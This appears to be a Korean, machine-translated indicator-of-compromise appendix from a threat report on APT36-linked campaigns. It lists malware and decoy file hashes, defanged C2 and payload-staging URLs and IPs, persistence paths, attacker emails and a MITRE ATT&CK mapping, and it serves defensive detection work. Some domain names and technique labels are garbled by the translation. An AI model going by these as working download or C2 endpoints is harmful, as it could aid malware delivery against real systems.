| abb863131bbffad1dd8ee72d0758f34b | tmps.dotm |
| eebb4913b54af93bcfc7d56e081502af | 프로젝트 및 서비스 섹션 보고서 10102023.docx |
| e73b0354790273b0fcaa8c2deab3ad87 | 해군 프로젝트 지불 섹션 보고서 131023.docx |
| 44b23edd6c9a63a2a38f1bf3d4ff5bb9 | 해군 프로젝트 지불 섹션 보고서 29092023.docx |
| 354716db015373c089744e7319cd93d3 | 해군 프로젝트 지불 섹션 보고서 29092023.docx |
| 기타 | |
| 6b45d5f194e2799e5178c8d858673900 | 08978.png (배트맨) |
| 56fd3a2f701d30fe3e5ebdd0d471f1ed | newpictures.png (MSI) |
| EXE | |
| 2478a5f6b82461eb06f3099478c4e2f6 | DUser.dll |
| 97113b266fbff61d8d2f92793672688d | Filmeos.exe |
| 96764912417d260653b6949afb0ad25c | Chromes.exe |
| 6a0adcf34a2f0ac21089b994dff02b85 | 파일질라.exe |
| 역방향 RAT | |
| a7a71259bdf700807a763119fd652e73 | svirbre.exe / Fantos.exe |
| c006701ec5025222a74a419f8c238689 | Postgrex.exe / rtloki.png |
| d5719a9ef7a6f012e26d0c86b4a676d9 | igfxm.exe / rt12.png |
| e6404136626a446b46bf4ecaa885560e | igfxtk.exe |
| Cheex | |
| 825c7a1603f800ff247c8f3e9a1420af | AdobeArm.exe / dlhost.exe |
| 253957d7df5c7e70ec9001766e8f087b | 치엑스.exe |
| USB 복사기 | |
| 3d2001c112290c019afcd51fede564d3 | AdobeReaders.exe / msedg.exe |
| 7ca8532b081f8612d1c0b6ea01d40299 | AdobeReaders.exe / msedgprefix.exe |
| 미끼 | |
| 5e88b5122ae380c4b4741dcf0bdca198 | 2024 회계연도 급여 인상.pdf |
| e415374f1f9533f10f706f0a9124b0d4 | WhatsApp 이미지 2024-05-06 오전 12.23.08.jpeg |
| e79ca3852ae5e14766544ec1d5d4d268 | 미중 대치 – 인도의 기회 Chadha 21 Aug 23.pdf |
| cc0b292144ccdf4a95014809258982c4 | 편지002.pdf |
| 584ce9670a6f6a16eaaa615d64788f68 | 해군 프로젝트.pdf |
| b2e007c6bde2d2ce03a5257732df95b2 | 001doc.pdf |
| d254f6d56ad874c5095b92d620cb5b80 | IT 트렌드.docx |
| 5fc559e4b663c20c9d5ea46fd164f4c7 | 설문조사.docx |
| f997a21e9f7ad5eb9242b4decb7fdeb9 | 인도 신흥 세계 경제.docx |
| 도메인(가짜/침해됨) | |
| utkalsevasamitikanjurmag[.]in | 162.0.209[.]114 |
| dipl[.]사이트 | 151.106.117[.]91 |
| 캠퍼스 포털[.] | 192.64.117[.]203 |
| 마자곤독[.]닷컴 | |
| 슬라이드파인더[.]닷컴 | |
| C2 및 포트 | |
| checkdailytips.servehttp[.]com/dailyworkout | |
| defender[.]windowupdatecache[.]in/ 172.67.128[.]127:80 |
|
| 84.247.170[.]237:4858 | |
| 64.188.27[.]144:5863 | |
| hxxp://vocport[.]com/Contactus | |
| hxxp://vocport[.]com/khalistanLeaderprotest | |
| hxxp://149.28.95[.]195/dakshf_upload.php | |
| hxxps://googleservices[.]live/dakshf_upload.php | |
| URL이 | |
| hxxps://campusportals[.]in/files/documents/bs/economy/ | |
| hxxps://campusportals[.]in/files/documents/bs/economy/1.hta | |
| hxxps://campusportals[.]in/files/documents/bs/economy/2.hta | |
| hxxps://campusportals[.]in/files/documents/bs/it/ | |
| hxxps://campusportals[.]in/files/documents/bs/it/1.hta | |
| hxxps://campusportals[.]in/files/documents/bs/it/2.hta | |
| hxxps://campusportals[.]in/files/documents/bs/survey/ | |
| hxxps://campusportals[.]in/files/documents/bs/survey/1.hta | |
| hxxps://campusportals[.]in/files/documents/bs/survey/2.hta | |
| hxxps://campusportals[.]in/files/2.hta | |
| hxxps://campusportals[.]in/files/documents/bs/2.hta | |
| hxxps://campusportals[.]in/files/documents/xmlnsprcs.hta | |
| hxxps://utkalsevasamitikanjurmarg[.]in/assets/pdfs/Salary_Increment_FY_2024/binastos10/ | |
| hxxps://utkalsevasamitikanjurmarg[.]in/assets/pdfs/Salary_Increment_FY_2024/binastos10/newpictures.png | |
| hxxps://utkalsevasamitikanjurmarg[.]in/assets/pdfs/Salary_Increment_FY_2024/Salary_Increment_FY_2024.zip | |
| hxxps://dipl[.]사이트/콘텐츠/2022-23/01/03/ | |
| hxxps://dipl[.]site/Content/2022-23/01/03/Imge12542.hta | |
| hxxps://dipl[.]site/Content/2022-23/01/04/WhatsApp_Image_2024-05-06.zip | |
| hxxps://dipl[.]사이트/콘텐츠/2022-23/01/01/ | |
| hxxps://dipl[.]site/Content/2022-23/01/01/ugt254d.hta | |
| hxxps://dipl[.]site/Content/2022-23/01/02/US_China_standoff-Opportunity-for-India-Chadha-21-Aug-23.zip | |
| hxxps://slidesfinder[.]com/free-templates/freefiles/158/08978.png | |
| hxxps://slidesfinder[.]com/free-templates/freefiles/158/Letter002.pdf | |
| hxxps://slidesfinder[.]com/free-templates/freefiles/158/rt12.png | |
| hxxps://slidesfinder[.]com/free-templates/freefiles/158/rtloki.png | |
| hxxps://slidesfinder[.]com/free-templates/freefiles/158/tmps.dotm | |
| hxxps://mazagondoc[.]com/documents01/001doc.pdf | |
| hxxps://mazagondoc[.]com/documents01/08978.png | |
| hxxps://mazagondoc[.]com/documents01/Filezilla.exe | |
| hxxps://mazagondoc[.]com/documents01/Letter002.pdf | |
| hxxps://mazagondoc[.]com/documents01/rt12.png | |
| hxxps://mazagondoc[.]com/documents01/sigthief.py | |
| hxxps://mazagondoc[.]com/images/AdobeArm.exe | |
| hxxps://mazagondoc[.]com/images/AdobeReader.bat | |
| hxxps://mazagondoc[.]com/images/Chromes.exe | |
| hxxps://mazagondoc[.]com/images/awccs.bat | |
| hxxps://mazagondoc[.]com/images/igfxtk.bat | |
| hxxps://mazagondoc[.]com/images/igfxtk.exe | |
| hxxps://mazagondoc[.]com/images/msedg.bat | |
| hxxps://mazagondoc[.]com/images/msedg.exe | |
| hxxps://mazagondoc[.]com/images/msedgprefix.exe | |
| hxxps://mazagondoc[.]com/images/sigthief.py | |
| hxxps://mazagondoc[.]com/images/pdf/Naval_Projects_Payment_section_Report_29092023.docx | |
| hxxps://mazagondoc[.]com/images/pdf/cheexe.exe | |
| hxxps://mazagondoc[.]com/images/templates/Aerospace.dotm | |
| hxxps://mazagondoc[.]com/images/templates/Naval_Projects_Payment_section_Report_131023.docx | |
| hxxps://mazagondoc[.]com/images/templates/Slide7.png | |
| hxxps://mazagondoc[.]com/images/templates/logo.png | |
| hxxps://mazagondoc[.]com/images/templates/propritery/doc-logo.png | |
| hxxps://mazagondoc[.]com/images/word/Naval_Projects_Payment_section_Report_131023.docx | |
| hxxps://mazagondoc[.]com/images/word/Project_and_Services_Section_report_10102023.docx | |
| 주인 | |
| C:\Windows\Tasks\useH.hta | |
| C:\Windows\Tasks\useT.hta | |
| C:\Windows\Tasks\alphaT.hta | |
| C:\Windows\Tasks\appH.bat | |
| C:\Windows\Tasks\appT.bat | |
| C:\Windows\Tasks\user01.bat | |
| C:\Windows\Tasks\user02.bat | |
| C:\ProgramData\VSUpdates\svirbre.exe | |
| C:\Users\사용자\AppData\Roaming\AdobeArm.exe | |
| C:\Users\user\AppData\Local\PrintsLogs\Postgres.exe | |
| C:\Users\Public\BroadCastHUB\DUser.dll | |
APT36
| f264ed8c76b1102ea55d73d931ab879b | 설문조사1.zip |
| 6065407484f1e22e814dfa00bd1fae06 | PCBL_05_25_JUNE_2024_IP 통합.pdf.데스크톱 |
| bdde8c9948142fafeec00d7094ae964f | LTC_체크리스트.데스크탑 |
| bd9de1f98e8797926ab0fc9f2c6ca888 | Ph-III의 순환 전이에 따른 전이 게시.데스크톱 |
| 8b5bf198e4948d4fe6a4b0402f7246e5 | IAFT-1715.zip |
| 2bf596603c432fa46b494dc3edd2d30f | GTK 테마 파싱.txt |
| 3a65fbc14bd7ff12cda97282935eefd8 | 인터넷 사용 설문지_보호됨.pdf(미끼) |
| 꼬마 요정 | |
| 4eaa6a69c9835c29ce8d39734e5d3d5f | 비밀번호(Golang 다운로더) |
| 4c52bb770d7b8639e1f305f908dbc800 | vmcoreinfo.txt (DISGOMOJI) |
| 포세이돈 | |
| c5ef19c97462e791f21c32931975dc7b | 디스트로-DLNA |
| b2d407d569e4b21ff12736dbc434577f | cjs-bin |
| 12aef7e734fb872f9160a1c2a47326d5 | bin-xdg |
| 7d6373d9f9a4270bd8af53f3861d7a9c | acpid-dit |
| IP | |
| 165.22.221[.]71 178.128.166[.]148 152.42.162[.]105 161.35.207[.]209 159.65.146[.]80 157.245.100[.]177 |
포세이돈 |
| URL이 | |
| hxxps://campusportals[.]in/myfiles/bdocuments/survey1.zip | |
| 165.22.221[.]71/디스트로-dlna | |
| 178.128.166[.]148/cjs-bin | |
| 159.65.146[.]80/bin-xdg | |
| 157.245.100[.]177/acpid-dit | |
| hxxps://drive.google[.]com/file/d/1p9rewZLjJ3WUdmj_As6el9G5IPNtkEUN/view?usp=sharing | |
| hxxps://drive.google[.]com/file/d/1cAPvjfakAWIHVa_cZXw_iwLDqsIi1uRX/view?usp=sharing | |
| hxxps://drive.google[.]com/file/d/1cIxWwVrhS4L6EHiDKc8Ua86NtciC4Njx/view?usp=sharing | |
| hxxps://drive.google[.]com/uc?export=download&id=1dlI8jSabaeJT1MnQxiih0Ww-hZrG-GAe | |
| hxxps://drive.google[.]com/uc?export=download&id=1XvW8ir8l0G9axv4lhEvQFOxOyzmMV64t | |
| hxxps://drive.google[.]com/uc?export=download&id=1btUsB3nWehTNW8Cho9Wv3Efrt4c6EhI_ | |
| fikumatry@gmail[.]com | |
| fitfalcon0900@gmail[.]com | |
MITER ATT & CK
| 술책 | 기술 ID | 이름 |
| 자원 개발 | T1583.001 T1584.001 T1587.001 T1588.001 T1588.002 T1608.001 T1608.005 |
인프라 획득: 도메인 침해 인프라: 도메인 기능 개발: 맬웨어 기능 획득: 멀웨어 능력 획득: 도구 단계 기능: 맬웨어 업로드 스테이지 기능: 링크 대상 |
| 초기 액세스 | T1566.001 T1566.002 |
피싱: 스피어 피싱 첨부 파일 피싱: 스피어 피싱 링크 |
| 실행 | T1106 T1129 T1059 T1047 T1204.001 T1204.002 |
네이티브 API 공유 모듈 명령 및 스크립팅 해석기 윈도우 관리 계장 사용자 실행: 악성 링크 사용자 실행: 악성 파일 |
| 고집 | T1053.003 T1547.001 T1547.013 |
예약된 작업/작업: Cron 레지스트리 실행 키/시작 폴더 부팅 또는 로그온 자동 시작 실행: XDG 자동 시작 항목 |
| 방어 회피 | T1027.010 T1036.005 T1036.007 T1140 T1218.005 T1574.002 T1027.009 T1027.010 |
명령 난독화 가장 무도회: 적법한 이름 또는 위치 일치 가장: 이중 파일 확장자 파일 또는 정보의 난독화/디코드 시스템 바이너리 프록시 실행: Mshta 하이재킹 실행 흐름: DLL 사이드 로딩 난독화된 파일 또는 정보: 임베디드 페이로드 난독화된 파일 또는 정보: 명령 난독화 |
| 발견 | T1012 T1016 T1033 T1057 T1082 T1083 T1518.001 |
쿼리 레지스트리 시스템 네트워크 구성 검색 시스템 소유자/사용자 검색 프로세스 발견 시스템 정보 검색 파일 및 디렉토리 검색 소프트웨어 검색: 보안 소프트웨어 검색 |
| 수집 | T1005 T1056.001 T1074.001 T1119 T1113 T1125 |
로컬 시스템의 데이터 입력 캡처: 키로깅 데이터 스테이징: 로컬 데이터 스테이징 자동 수집 화면 캡처 비디오 캡처 |
| 명령 및 제어 | T1105 T1571 T1573 T1071.001 |
인그레스 도구 전송 비표준 포트 암호화된 채널 애플리케이션 계층 프로토콜: 웹 프로토콜 |
| 여과 | T1020 T1041 T1567 |
자동화된 유출 C2 채널을 통한 유출 웹 서비스를 통한 유출 |
저자: 사트윅 람 프라키



